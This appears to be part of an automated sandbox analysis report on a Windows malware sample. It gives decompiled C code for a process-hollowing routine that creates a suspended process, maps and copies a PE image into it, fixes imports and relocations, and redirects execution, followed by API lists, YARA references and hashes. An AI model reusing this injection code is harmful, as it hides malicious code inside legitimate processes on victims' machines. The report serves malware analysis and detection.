                                                                                                        • Opcode Fuzzy Hash: a01fb3011eea16f0657583ec84761e03cb712b6dfc41820b4ced66a2982edb9b
                                                                                                        • Instruction Fuzzy Hash: D2C0803040510C1BDF104568EC04255370CC701374F504B71FC1CD45F1D337BC924199
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Non-executed Functions

                                                                                                        Function 00405420, Relevance: 56.5, APIs: 27, Strings: 5, Instructions: 522nativememorysleepCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 92%
                                                                                                        			E00405420(char* __ecx, struct HINSTANCE__* __edx, void* __eflags, WCHAR* _a4) {
				CHAR* _v8;
				void _v12;
				CHAR* _v16;
				struct HINSTANCE__* _v20;
				struct HINSTANCE__* _v24;
				void* _v28;
				void* _v32;
				CHAR** _v36;
				long _v40;
				struct _PROCESS_INFORMATION _v56;
				long _v60;
				long _v64;
				intOrPtr _v68;
				long _v72;
				void* _v76;
				char _v80;
				char _v83;
				intOrPtr _v87;
				char _v88;
				intOrPtr _v92;
				long _v100;
				long _v108;
				intOrPtr _v128;
				char _v132;
				struct _STARTUPINFOW _v200;
				struct _CONTEXT _v916;
				int _t154;
				CHAR* _t155;
				CHAR* _t156;
				void* _t160;
				void* _t161;
				CHAR* _t162;
				CHAR* _t163;
				CHAR* _t175;
				CHAR* _t178;
				intOrPtr _t179;
				CHAR** _t180;
				CHAR* _t186;
				CHAR* _t190;
				CHAR* _t194;
				void* _t197;
				long _t199;
				CHAR* _t208;
				signed short _t211;
				CHAR* _t213;
				_Unknown_base(*)()* _t214;
				intOrPtr _t218;
				CHAR* _t225;
				CHAR* _t229;
				void* _t234;
				void* _t235;
				CHAR* _t250;
				CHAR* _t261;
				CHAR* _t266;
				CHAR** _t273;
				CHAR* _t275;
				CHAR* _t278;
				CHAR* _t284;
				signed int _t285;
				signed int _t286;
				struct HINSTANCE__* _t287;
				CHAR** _t288;
				CHAR* _t291;
				long _t294;
				CHAR* _t295;
				_Unknown_base(*)()** _t297;
				CHAR** _t299;
				intOrPtr _t301;
				long _t304;
				void* _t305;
				void* _t307;
				CHAR* _t309;
				signed short* _t310;
				CHAR** _t311;
				void* _t312;
				signed short* _t314;
				CHAR* _t315;
				void* _t316;
				void* _t317;
				void* _t318;
				void* _t320;
				void* _t324;

				_t287 = __edx;
				_t280 = __ecx;
				asm("xorps xmm0, xmm0");
				_v12 = 0;
				_v72 = 0;
				_v40 = 0;
				_v20 = 0;
				_v64 = 0;
				_v60 = 0;
				_v28 = 0;
				_v32 = 0;
				_v16 = 0;
				_v8 = 0;
				_v76 = 0;
				_v24 = 0;
				asm("movups [ebp-0x80], xmm0");
				asm("movq [ebp-0x70], xmm0");
				asm("movq [ebp-0x60], xmm0");
				asm("movq [ebp-0x68], xmm0");
				asm("movups [ebp-0x34], xmm0");
				E00401BB0( &_v200, 0, 0x44);
				E00401BB0( &_v916, 0, 0x2cc);
				_v200.cb = 0x44;
				_t317 = _t316 + 0x18;
				_t324 =  *0x40c038 - 0x5a4d; // 0x6b7d
				if(_t324 != 0) {
					E00401CE0("0125789244697858", 0x10, 0x40c038, 0xe7c00);
					_t317 = _t317 + 0x10;
				}
				_t154 = CreateProcessW(0, _a4, 0, 0, 0, 0x8000004, 0, 0,  &_v200,  &_v56);
				if(_t154 != 0) {
					_t155 =  *0x5d108c;
					__eflags = _t155;
					if(_t155 != 0) {
						_t280 =  &_v132;
						_t156 =  *_t155(_v56.hProcess, 0,  &_v132, 0x18, 0);
						__eflags = _t156;
						if(_t156 != 0) {
							goto L9;
						} else {
							_t175 = ReadProcessMemory(_v56.hProcess, _v128 + 8,  &_v12, 4,  &_v40);
							__eflags = _t175;
							if(_t175 == 0) {
								goto L8;
							} else {
								__eflags = _v40 - 4;
								if(_v40 != 4) {
									goto L8;
								} else {
									goto L21;
								}
							}
						}
					} else {
						_v916.ContextFlags = 0x10007;
						_t261 = GetThreadContext(_v56.hThread,  &_v916);
						__eflags = _t261;
						if(_t261 == 0) {
							L9:
							TerminateProcess(_v56.hProcess, 0);
							CloseHandle(_v56.hProcess);
							CloseHandle(_v56.hThread);
							_t160 = _v28;
							__eflags = _t160;
							if(_t160 != 0) {
								NtClose(_t160);
							}
							_t161 = _v32;
							__eflags = _t161;
							if(_t161 != 0) {
								NtClose(_t161);
							}
							_t162 = _v16;
							__eflags = _t162;
							if(_t162 != 0) {
								asm("cdq");
								E00407120(_t287, GetCurrentProcess(), _t162, _t287);
							}
							_t163 = _v8;
							__eflags = _t163;
							if(_t163 != 0) {
								asm("cdq");
								E00407120(_t287, GetCurrentProcess(), _t163, _t287);
							}
							__eflags = 0;
							return 0;
						} else {
							_t266 = ReadProcessMemory(_v56.hProcess, _v916.Ebx + 8,  &_v12, 4,  &_v40);
							__eflags = _t266;
							if(_t266 == 0) {
								L8:
								goto L9;
							} else {
								__eflags = _v40 - 4;
								if(_v40 == 4) {
									L21:
									_t178 = E00405A50(_t280, _v56.hProcess, _v12,  &_v20,  &_v72);
									_t318 = _t317 + 0x10;
									__eflags = _t178;
									if(_t178 == 0) {
										goto L8;
									} else {
										__eflags =  *0x40c038 - 0x5a4d; // 0x6b7d
										if(__eflags != 0) {
											goto L8;
										} else {
											_t179 =  *0x40c074; // 0x383538b7
											__eflags =  *((intOrPtr*)(_t179 + 0x40c038)) - 0x4550;
											_t180 = _t179 + 0x40c038;
											_v36 = _t180;
											if( *((intOrPtr*)(_t179 + 0x40c038)) != 0x4550) {
												goto L8;
											} else {
												__eflags =  *((intOrPtr*)(_t180 + 0x18)) - 0x10b;
												if( *((intOrPtr*)(_t180 + 0x18)) != 0x10b) {
													goto L8;
												} else {
													__eflags =  *(_t180 + 0xa0);
													_t304 =  *(_t180 + 0x50);
													_v68 =  *((intOrPtr*)(_t180 + 0x34));
													_t283 =  *((intOrPtr*)(_t180 + 0x28));
													_v80 =  *((intOrPtr*)(_t180 + 0x28));
													if(__eflags == 0) {
														goto L8;
													} else {
														_t294 = _v20;
														_v100 = _t294;
														__eflags = E00406F00(_t283, _t287, __eflags,  &_v28, 0xf001f, 0,  &_v100, 0x40, 0x8000000, 0);
														if(__eflags != 0) {
															goto L8;
														} else {
															_v108 = _t304;
															_t186 = E00406F00(_t283, _t287, __eflags,  &_v32, 0xf001f, 0,  &_v108, 0x40, 0x8000000, _t183);
															__eflags = _t186;
															if(_t186 != 0) {
																goto L8;
															} else {
																_v16 = _t186;
																_v64 = _t294;
																_t190 = E00406FE0(_t283, _t287, _v28, GetCurrentProcess(),  &_v16, 0, 0, 0,  &_v64, 1, _t186, 0x40);
																__eflags = _t190;
																if(_t190 != 0) {
																	goto L8;
																} else {
																	_v8 = _t190;
																	_v60 = _t304;
																	_t194 = E00406FE0(_t283, _t287, _v32, GetCurrentProcess(),  &_v8, 0, 0, 0,  &_v60, 1, _t190, 0x40);
																	__eflags = _t194;
																	if(_t194 != 0) {
																		goto L8;
																	} else {
																		_v24 = _t194;
																		_t197 = E00406FE0(_t283, _t287, _v32, _v56.hProcess,  &_v24, 0, 0, 0,  &_v60, 1, _t194, 0x40);
																		__eflags = _t197;
																		if(_t197 != 0) {
																			goto L8;
																		} else {
																			_t305 = VirtualAlloc(_t197, _t294, 0x3000, 4);
																			__eflags = _t305;
																			if(_t305 == 0) {
																				goto L8;
																			} else {
																				_t199 = ReadProcessMemory(_v56.hProcess, _v12, _t305, _t294, 0);
																				__eflags = _t199;
																				if(_t199 != 0) {
																					E00401640(_v16, _t305, _t294);
																					VirtualFree(_t305, 0, 0x8000);
																					_t273 = _v36;
																					_t295 =  *(_t273 + 6) & 0x0000ffff;
																					_t82 = _t273 + 0x18; // 0x18
																					_t307 = _t82 + ( *(_t273 + 0x14) & 0x0000ffff);
																					E00401640(_v8, 0x40c038, (_t295 + _t295 * 4 << 3) - 0x40c038 + _t307);
																					_t320 = _t318 + 0x18;
																					__eflags = _t295;
																					if(_t295 != 0) {
																						_t315 = _t307 + 0x14;
																						__eflags = _t315;
																						do {
																							E00401640( *((intOrPtr*)(_t315 - 8)) + _v8,  *_t315 + 0x40c038,  *((intOrPtr*)(_t315 - 4)));
																							_t320 = _t320 + 0xc;
																							_t315 =  &(_t315[0x28]);
																							_t295 = _t295 - 1;
																							__eflags = _t295;
																						} while (_t295 != 0);
																					}
																					_t284 = _v8;
																					_t275 =  *((intOrPtr*)(_t273 + 0x80)) + _t284;
																					__eflags = _t275;
																					while(1) {
																						_t208 = _t275[0xc];
																						__eflags = _t208;
																						if(_t208 != 0) {
																							goto L40;
																						}
																						__eflags = _t275[4] - _t208;
																						if(_t275[4] == _t208) {
																							_t311 = _v36;
																							_t287 = _v24;
																							_v68 = _t287 - _v68;
																							_t299 =  *((intOrPtr*)(_t311 + 0xa0)) + _t284;
																							_t218 =  *((intOrPtr*)(_t311 + 0xa4)) + _t299;
																							_v36 = _t299;
																							_v92 = _t218;
																							__eflags = _t299 - _t218;
																							if(_t299 < _t218) {
																								while(1) {
																									_t250 =  *_t299;
																									__eflags = _t250;
																									if(_t250 == 0) {
																										break;
																									}
																									_t288 =  &(_t299[1]);
																									_v20 = _t288;
																									_t314 =  &(_t299[2]);
																									_t278 =  &(_t250[_t284]);
																									_t291 =  *_t288 - 8 >> 1;
																									__eflags = _t291;
																									if(_t291 != 0) {
																										_t301 = _v68;
																										do {
																											_t285 =  *_t314 & 0x0000ffff;
																											_t291 = _t291 - 1;
																											__eflags = (_t285 & 0x0000f000) - 0x3000;
																											if((_t285 & 0x0000f000) == 0x3000) {
																												_t286 = _t285 & 0x00000fff;
																												_t114 =  &(_t278[_t286]);
																												 *_t114 =  &(_t278[_t286][_t301]);
																												__eflags =  *_t114;
																											}
																											_t314 =  &(_t314[1]);
																											__eflags = _t291;
																										} while (_t291 != 0);
																										_t284 = _v8;
																										_t299 = _v36;
																									}
																									_t299 = _t299 +  *_v20;
																									_v36 = _t299;
																									__eflags = _t299 - _v92;
																									if(_t299 < _v92) {
																										continue;
																									}
																									break;
																								}
																								_t287 = _v24;
																							}
																							_v88 = 0x68;
																							_v87 = _v80 + _t287;
																							_v83 = 0xc3;
																							E00401640( &(_v16[_v72]),  &_v88, 6);
																							_t225 = E00407120(_t287, _v56.hProcess, _v12, 0);
																							__eflags = _t225;
																							if(_t225 != 0) {
																								goto L8;
																							} else {
																								_v76 = _v12;
																								_t229 = E00406FE0(_t284, _t287, _v28, _v56.hProcess,  &_v76, 0, 0, 0,  &_v64, 1, 0, 0x40);
																								__eflags = _t229;
																								if(_t229 != 0) {
																									goto L8;
																								} else {
																									E004071A0(_t284, _t287, _v56.hThread);
																									Sleep(0x1388);
																									_t312 = VirtualAlloc(0, 0x138, 0x3000, 4);
																									__eflags = _t312;
																									if(_t312 != 0) {
																										E00401BB0(_t312, 0, 0x138);
																										asm("cdq");
																										E004074D0(_t284, _t287, _v56.hProcess, _v24, _t287, _t312, 0x138,  &_v80);
																										VirtualFree(_t312, 0, 0x8000);
																									}
																									CloseHandle(_v56);
																									CloseHandle(_v56.hThread);
																									_t234 = _v28;
																									__eflags = _t234;
																									if(_t234 != 0) {
																										NtClose(_t234);
																									}
																									_t235 = _v32;
																									__eflags = _t235;
																									if(_t235 != 0) {
																										NtClose(_t235);
																									}
																									asm("cdq");
																									E00407120(_t287, GetCurrentProcess(), _v16, _t287);
																									asm("cdq");
																									E00407120(_t287, GetCurrentProcess(), _v8, _t287);
																									_t147 =  &(_v56.dwProcessId); // 0x40306e
																									return  *_t147;
																								}
																							}
																						} else {
																							goto L40;
																						}
																						goto L69;
																						L40:
																						_t287 = E00408B00( &(_t208[_t284]));
																						_t320 = _t320 + 4;
																						_v20 = _t287;
																						__eflags = _t287;
																						if(_t287 == 0) {
																							goto L8;
																						} else {
																							_t284 = _v8;
																							_t309 =  &(_t284[ *_t275]);
																							_t297 =  &(_t284[_t275[0x10]]);
																							__eflags = _t309 - _t284;
																							_t310 =  ==  ? _t297 : _t309;
																							__eflags = _t310 - _t284;
																							if(_t310 == _t284) {
																								goto L8;
																							} else {
																								_t211 =  *_t310;
																								__eflags = _t211;
																								if(_t211 == 0) {
																									L49:
																									_t275 =  &(_t275[0x14]);
																									continue;
																								} else {
																									while(1) {
																										__eflags = _t211;
																										if(_t211 >= 0) {
																											_t213 = _t211 + 2 + _t284;
																											__eflags = _t213;
																										} else {
																											_t213 = _t211 & 0x0000ffff;
																										}
																										_t214 = GetProcAddress(_t287, _t213);
																										 *_t297 = _t214;
																										__eflags = _t214;
																										if(_t214 == 0) {
																											goto L8;
																										}
																										_t211 = _t310[2];
																										_t310 =  &(_t310[2]);
																										_t284 = _v8;
																										_t297 = _t297 + 4;
																										__eflags = _t211;
																										if(_t211 == 0) {
																											goto L49;
																										} else {
																											_t287 = _v20;
																											continue;
																										}
																										goto L69;
																									}
																									goto L8;
																								}
																							}
																						}
																						goto L69;
																					}
																				} else {
																					VirtualFree(_t305, _t199, 0x8000);
																					goto L8;
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								} else {
									goto L8;
								}
							}
						}
					}
				} else {
					return _t154;
				}
				L69:
			}





















































































                                                                                                        0x00405420
                                                                                                        0x00405420
                                                                                                        0x0040542a
                                                                                                        0x0040542d
                                                                                                        0x0040543c
                                                                                                        0x00405446
                                                                                                        0x0040544d
                                                                                                        0x00405454
                                                                                                        0x0040545b
                                                                                                        0x00405462
                                                                                                        0x00405469
                                                                                                        0x00405470
                                                                                                        0x00405477
                                                                                                        0x0040547e
                                                                                                        0x00405485
                                                                                                        0x0040548c
                                                                                                        0x00405490
                                                                                                        0x00405495
                                                                                                        0x0040549a
                                                                                                        0x0040549f
                                                                                                        0x004054a3
                                                                                                        0x004054b6
                                                                                                        0x004054c0
                                                                                                        0x004054ca
                                                                                                        0x004054cd
                                                                                                        0x004054d4
                                                                                                        0x004054e7
                                                                                                        0x004054ec
                                                                                                        0x004054ec
                                                                                                        0x0040550e
                                                                                                        0x00405516
                                                                                                        0x0040551d
                                                                                                        0x0040552a
                                                                                                        0x0040552c
                                                                                                        0x004055eb
                                                                                                        0x004055f4
                                                                                                        0x004055f6
                                                                                                        0x004055f8
                                                                                                        0x00000000
                                                                                                        0x004055fa
                                                                                                        0x00405614
                                                                                                        0x00405616
                                                                                                        0x00405618
                                                                                                        0x00000000
                                                                                                        0x0040561e
                                                                                                        0x0040561e
                                                                                                        0x00405622
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405622
                                                                                                        0x00405618
                                                                                                        0x00405532
                                                                                                        0x00405538
                                                                                                        0x00405546
                                                                                                        0x0040554c
                                                                                                        0x0040554e
                                                                                                        0x00405583
                                                                                                        0x00405588
                                                                                                        0x00405597
                                                                                                        0x0040559c
                                                                                                        0x0040559e
                                                                                                        0x004055a1
                                                                                                        0x004055a3
                                                                                                        0x004055a6
                                                                                                        0x004055a6
                                                                                                        0x004055ac
                                                                                                        0x004055af
                                                                                                        0x004055b1
                                                                                                        0x004055b4
                                                                                                        0x004055b4
                                                                                                        0x004055ba
                                                                                                        0x004055bd
                                                                                                        0x004055bf
                                                                                                        0x004055c1
                                                                                                        0x004055c7
                                                                                                        0x004055c7
                                                                                                        0x004055cc
                                                                                                        0x004055cf
                                                                                                        0x004055d1
                                                                                                        0x004055d3
                                                                                                        0x004055d9
                                                                                                        0x004055d9
                                                                                                        0x004055e0
                                                                                                        0x004055e6
                                                                                                        0x00405550
                                                                                                        0x0040556d
                                                                                                        0x0040556f
                                                                                                        0x00405571
                                                                                                        0x0040557d
                                                                                                        0x00000000
                                                                                                        0x00405573
                                                                                                        0x00405573
                                                                                                        0x00405577
                                                                                                        0x00405628
                                                                                                        0x00405636
                                                                                                        0x0040563b
                                                                                                        0x0040563e
                                                                                                        0x00405640
                                                                                                        0x00000000
                                                                                                        0x00405646
                                                                                                        0x00405646
                                                                                                        0x0040564d
                                                                                                        0x00000000
                                                                                                        0x00405653
                                                                                                        0x00405653
                                                                                                        0x00405658
                                                                                                        0x00405662
                                                                                                        0x00405668
                                                                                                        0x0040566b
                                                                                                        0x00000000
                                                                                                        0x00405671
                                                                                                        0x00405676
                                                                                                        0x0040567a
                                                                                                        0x00000000
                                                                                                        0x00405680
                                                                                                        0x00405680
                                                                                                        0x0040568a
                                                                                                        0x0040568d
                                                                                                        0x00405690
                                                                                                        0x00405693
                                                                                                        0x00405696
                                                                                                        0x00000000
                                                                                                        0x0040569c
                                                                                                        0x0040569c
                                                                                                        0x004056b6
                                                                                                        0x004056bf
                                                                                                        0x004056c1
                                                                                                        0x00000000
                                                                                                        0x004056c7
                                                                                                        0x004056d2
                                                                                                        0x004056e1
                                                                                                        0x004056e6
                                                                                                        0x004056e8
                                                                                                        0x00000000
                                                                                                        0x004056ee
                                                                                                        0x004056f3
                                                                                                        0x00405703
                                                                                                        0x00405711
                                                                                                        0x00405716
                                                                                                        0x00405718
                                                                                                        0x00000000
                                                                                                        0x0040571e
                                                                                                        0x00405723
                                                                                                        0x00405733
                                                                                                        0x00405741
                                                                                                        0x00405746
                                                                                                        0x00405748
                                                                                                        0x00000000
                                                                                                        0x0040574e
                                                                                                        0x00405753
                                                                                                        0x0040576a
                                                                                                        0x0040576f
                                                                                                        0x00405771
                                                                                                        0x00000000
                                                                                                        0x00405777
                                                                                                        0x00405786
                                                                                                        0x00405788
                                                                                                        0x0040578a
                                                                                                        0x00000000
                                                                                                        0x00405790
                                                                                                        0x0040579a
                                                                                                        0x0040579c
                                                                                                        0x0040579e
                                                                                                        0x004057b7
                                                                                                        0x004057c7
                                                                                                        0x004057cd
                                                                                                        0x004057d0
                                                                                                        0x004057d4
                                                                                                        0x004057db
                                                                                                        0x004057f3
                                                                                                        0x004057f8
                                                                                                        0x004057fb
                                                                                                        0x004057fd
                                                                                                        0x004057ff
                                                                                                        0x004057ff
                                                                                                        0x00405802
                                                                                                        0x00405814
                                                                                                        0x00405819
                                                                                                        0x0040581c
                                                                                                        0x0040581f
                                                                                                        0x0040581f
                                                                                                        0x0040581f
                                                                                                        0x00405802
                                                                                                        0x0040582a
                                                                                                        0x0040582d
                                                                                                        0x0040582d
                                                                                                        0x00405830
                                                                                                        0x00405830
                                                                                                        0x00405833
                                                                                                        0x00405835
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405837
                                                                                                        0x0040583a
                                                                                                        0x004058ad
                                                                                                        0x004058b0
                                                                                                        0x004058b8
                                                                                                        0x004058c7
                                                                                                        0x004058c9
                                                                                                        0x004058cb
                                                                                                        0x004058ce
                                                                                                        0x004058d1
                                                                                                        0x004058d3
                                                                                                        0x004058d5
                                                                                                        0x004058d5
                                                                                                        0x004058d7
                                                                                                        0x004058d9
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x004058db
                                                                                                        0x004058de
                                                                                                        0x004058e1
                                                                                                        0x004058e6
                                                                                                        0x004058ec
                                                                                                        0x004058ec
                                                                                                        0x004058ee
                                                                                                        0x004058f0
                                                                                                        0x004058f3
                                                                                                        0x004058f3
                                                                                                        0x004058f6
                                                                                                        0x004058fe
                                                                                                        0x00405903
                                                                                                        0x00405905
                                                                                                        0x0040590b
                                                                                                        0x0040590b
                                                                                                        0x0040590b
                                                                                                        0x0040590b
                                                                                                        0x0040590e
                                                                                                        0x00405911
                                                                                                        0x00405911
                                                                                                        0x00405915
                                                                                                        0x00405918
                                                                                                        0x00405918
                                                                                                        0x0040591e
                                                                                                        0x00405920
                                                                                                        0x00405923
                                                                                                        0x00405926
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405926
                                                                                                        0x00405928
                                                                                                        0x00405928
                                                                                                        0x00405930
                                                                                                        0x00405934
                                                                                                        0x00405944
                                                                                                        0x00405948
                                                                                                        0x00405958
                                                                                                        0x0040595d
                                                                                                        0x0040595f
                                                                                                        0x00000000
                                                                                                        0x00405965
                                                                                                        0x0040596e
                                                                                                        0x00405985
                                                                                                        0x0040598a
                                                                                                        0x0040598c
                                                                                                        0x00000000
                                                                                                        0x00405992
                                                                                                        0x00405995
                                                                                                        0x0040599f
                                                                                                        0x004059b9
                                                                                                        0x004059bb
                                                                                                        0x004059bd
                                                                                                        0x004059c7
                                                                                                        0x004059dc
                                                                                                        0x004059e2
                                                                                                        0x004059ef
                                                                                                        0x004059ef
                                                                                                        0x004059fe
                                                                                                        0x00405a03
                                                                                                        0x00405a05
                                                                                                        0x00405a08
                                                                                                        0x00405a0a
                                                                                                        0x00405a0d
                                                                                                        0x00405a0d
                                                                                                        0x00405a13
                                                                                                        0x00405a16
                                                                                                        0x00405a18
                                                                                                        0x00405a1b
                                                                                                        0x00405a1b
                                                                                                        0x00405a2a
                                                                                                        0x00405a30
                                                                                                        0x00405a38
                                                                                                        0x00405a3e
                                                                                                        0x00405a43
                                                                                                        0x00405a4c
                                                                                                        0x00405a4c
                                                                                                        0x0040598c
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x0040583c
                                                                                                        0x00405844
                                                                                                        0x00405846
                                                                                                        0x00405849
                                                                                                        0x0040584c
                                                                                                        0x0040584e
                                                                                                        0x00000000
                                                                                                        0x00405854
                                                                                                        0x00405854
                                                                                                        0x0040585c
                                                                                                        0x0040585e
                                                                                                        0x00405860
                                                                                                        0x00405862
                                                                                                        0x00405865
                                                                                                        0x00405867
                                                                                                        0x00000000
                                                                                                        0x0040586d
                                                                                                        0x0040586d
                                                                                                        0x0040586f
                                                                                                        0x00405871
                                                                                                        0x004058a8
                                                                                                        0x004058a8
                                                                                                        0x00000000
                                                                                                        0x00405873
                                                                                                        0x00405873
                                                                                                        0x00405873
                                                                                                        0x00405875
                                                                                                        0x0040587f
                                                                                                        0x0040587f
                                                                                                        0x00405877
                                                                                                        0x00405877
                                                                                                        0x00405877
                                                                                                        0x00405883
                                                                                                        0x00405889
                                                                                                        0x0040588b
                                                                                                        0x0040588d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405893
                                                                                                        0x00405896
                                                                                                        0x00405899
                                                                                                        0x0040589c
                                                                                                        0x0040589f
                                                                                                        0x004058a1
                                                                                                        0x00000000
                                                                                                        0x004058a3
                                                                                                        0x004058a3
                                                                                                        0x00000000
                                                                                                        0x004058a3
                                                                                                        0x00000000
                                                                                                        0x004058a1
                                                                                                        0x00000000
                                                                                                        0x00405873
                                                                                                        0x00405871
                                                                                                        0x00405867
                                                                                                        0x00000000
                                                                                                        0x0040584e
                                                                                                        0x004057a0
                                                                                                        0x004057a7
                                                                                                        0x00000000
                                                                                                        0x004057a7
                                                                                                        0x0040579e
                                                                                                        0x0040578a
                                                                                                        0x00405771
                                                                                                        0x00405748
                                                                                                        0x00405718
                                                                                                        0x004056e8
                                                                                                        0x004056c1
                                                                                                        0x00405696
                                                                                                        0x0040567a
                                                                                                        0x0040566b
                                                                                                        0x0040564d
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00000000
                                                                                                        0x00405577
                                                                                                        0x00405571
                                                                                                        0x0040554e
                                                                                                        0x0040551c
                                                                                                        0x0040551c
                                                                                                        0x0040551c
                                                                                                        0x00000000

                                                                                                        APIs
                                                                                                        • CreateProcessW.KERNEL32 ref: 0040550E
                                                                                                        • GetThreadContext.KERNEL32(?,?,I@,00000000,?,?,?,?,?,?), ref: 00405546
                                                                                                        • ReadProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,?,?,?,?,?), ref: 0040556D
                                                                                                        • TerminateProcess.KERNEL32(?,00000000,?,?,?,?,?,?), ref: 00405588
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 00405597
                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,?), ref: 0040559C
                                                                                                        • NtClose.NTDLL(00000000), ref: 004055A6
                                                                                                        • NtClose.NTDLL(00000000), ref: 004055B4
                                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 004055C4
                                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,?,?,?,?,?,?), ref: 004055D6
                                                                                                        • ReadProcessMemory.KERNEL32(?,?,00000000,00000004,00000000,?,?,?,?,?,?), ref: 00405614
                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000040,00000000,000F001F,00000000,?,00000040,08000000,00000000,00000000), ref: 00405707
                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000040,00000000,00000000), ref: 00405737
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000040,00000000,00000000), ref: 00405780
                                                                                                        • ReadProcessMemory.KERNEL32(?,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?), ref: 0040579A
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?), ref: 004057A7
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004057C7
                                                                                                        • GetProcAddress.KERNEL32(00000000,-00000002), ref: 00405883
                                                                                                        • Sleep.KERNEL32(00001388,?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000040,?,00000000,00000000), ref: 0040599F
                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000138,00003000,00000004), ref: 004059B3
                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,00000000,00000138,?), ref: 004059EF
                                                                                                        • CloseHandle.KERNEL32(?), ref: 004059FE
                                                                                                        • CloseHandle.KERNEL32(?), ref: 00405A03
                                                                                                        • NtClose.NTDLL(00000000), ref: 00405A0D
                                                                                                        • NtClose.NTDLL(00000000), ref: 00405A1B
                                                                                                        • GetCurrentProcess.KERNEL32(00000000), ref: 00405A2D
                                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,00000000), ref: 00405A3B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Process$Close$Current$Virtual$Handle$FreeMemoryRead$Alloc$AddressContextCreateProcSleepTerminateThread
                                                                                                        • String ID: 0125789244697858$D$h$n0@$I@
                                                                                                        • API String ID: 937709717-631519299
                                                                                                        • Opcode ID: 11f14d760a250409a41159bc870c405dcb3f81ba558e8e19d0d86d0464d3cc20
                                                                                                        • Instruction ID: 0427067da74405bbc224276ff2be7b89c7662c3791b2ba589faee8c975da3b6f
                                                                                                        • Opcode Fuzzy Hash: 11f14d760a250409a41159bc870c405dcb3f81ba558e8e19d0d86d0464d3cc20
                                                                                                        • Instruction Fuzzy Hash: CF124971E00609ABEB20DB94DD45FAFBBB9EF04704F144166FA04B72D1E778AD448B68
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 004087C0, Relevance: 7.6, APIs: 5, Instructions: 74nativefileCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 00408823
                                                                                                        • NtCreateFile.NTDLL(00000000,00120116,00000018,00000000,00000000,00000080,00000000,00000000,00000060,00000000,00000000), ref: 0040887E
                                                                                                        • NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004088A0
                                                                                                        • NtClose.NTDLL(00000000), ref: 004088AD
                                                                                                        • NtClose.NTDLL(00000000), ref: 004088B9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000010.00000002.493674671.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CloseFilePath$CreateNameName_Write
                                                                                                        • String ID:
                                                                                                        • API String ID: 589302162-0
                                                                                                        • Opcode ID: 4b83241a22351649e877d0acaabcec9a9ade22e4702b4ae3c0257c1d2849f9e0
                                                                                                        • Instruction ID: cdde318fc824664ac6a874490e4e1e0a00434436370c8205e3f3d3f15e695731
                                                                                                        • Opcode Fuzzy Hash: 4b83241a22351649e877d0acaabcec9a9ade22e4702b4ae3c0257c1d2849f9e0
                                                                                                        • Instruction Fuzzy Hash: D5310CB1D4020DBBEB10DF90DD49BEEBBB8EB04704F20415AF904B62D0D7B566589F99
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00408730, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 44nativeCOMMON
                                                                                                        Download Yara Rule
                                                                                                        C-Code - Quality: 58%
                                                                                                        			E00408730(char _a4) {
				void* _v8;
				intOrPtr _v12;
				void* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				void* _t23;
				void* _t25;
				void* _t29;

				_t1 =  &_a4; // 0x404a23
				_v16 =  *_t1;
				_v8 = 0;
				_v40 = 0x18;
				_v36 = 0;
				_v28 = 0;
				_v32 = 0;
				_v24 = 0;
				_v20 = 0;
				_v12 = 0;
				if(NtOpenProcess( &_v8, 1,  &_v40,  &_v16) == 0) {
					_t23 = _v8;
					if(_t23 == 0) {
						goto L1;
					} else {
						_t25 =  *0x5d10b0(_t23, 0, _t29);
						NtClose(_v8);
						return 0 | _t25 == 0x00000000;
					}
				} else {
					L1:
					return 0;
				}
			}















                                                                                                        0x00408736
                                                                                                        0x00408739
